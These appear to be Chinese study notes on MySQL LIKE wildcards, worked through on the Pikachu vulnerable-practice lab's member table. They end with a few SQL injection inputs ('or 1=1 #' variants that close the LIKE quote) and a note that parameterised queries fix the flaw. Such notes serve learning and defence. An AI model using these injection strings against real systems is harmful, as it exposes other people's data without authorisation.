在 MySQL 的 bin 目录下打开 cmd,输入下面的命令,然后按提示输入数据库密码:
REM Start the MySQL command-line client as root; --password with no value makes the client prompt for it.
mysql --user=root --password
-- List every database visible to this account.
SHOW DATABASES;

-- Make the pikachu database the default for the statements that follow.
USE pikachu;

-- Print the column definitions of the member table.
DESC member;

-- Every row, limited to the three columns these notes work with.
SELECT
    id,
    username,
    email
FROM member;

-- Exact match on the id column.
SELECT
    id,
    username,
    email
FROM member
WHERE id = 1;

-- '=' compares the whole string, so 'vince' and 'vin' are two different lookups;
-- a row named "vince" is not returned by the second query.
SELECT
    id,
    username,
    email
FROM member
WHERE username = 'vince';

SELECT
    id,
    username,
    email
FROM member
WHERE username = 'vin';
`%vin`:配合 `like` 使用时,查询以 vin 结尾的名称;用 `=` 时 `%` 只是普通字符,不起通配作用(对比下面第一条和第二条语句)
-- With '=', '%' is an ordinary character: this looks for the literal name "%vin".
SELECT
    id,
    username,
    email
FROM member
WHERE username = '%vin';

-- With LIKE, '%' matches any run of characters, including none.
-- Names ending in "vin".
SELECT
    id,
    username,
    email
FROM member
WHERE username LIKE '%vin';

-- Names starting with "vin".
SELECT
    id,
    username,
    email
FROM member
WHERE username LIKE 'vin%';

-- Names containing "vin" anywhere.
SELECT
    id,
    username,
    email
FROM member
WHERE username LIKE '%vin%';

-- Consecutive '%' wildcards match the same strings as a single one,
-- so this is the same pattern as '%vin%'.
SELECT
    id,
    username,
    email
FROM member
WHERE username LIKE '%%vin%%';

在Pikachu靶场里查询
xx' or 1=1 #
要注意闭合 `%`,让信息查得全。这类输入能生效,应该是因为后端把输入直接拼接进了 `like '%…%'` 语句;改用参数化查询(预编译语句),并把 `%` 放在绑定的参数值里,输入就只会被当作数据处理。
xx%' or 1=1 #
%xx%' or 1=1 #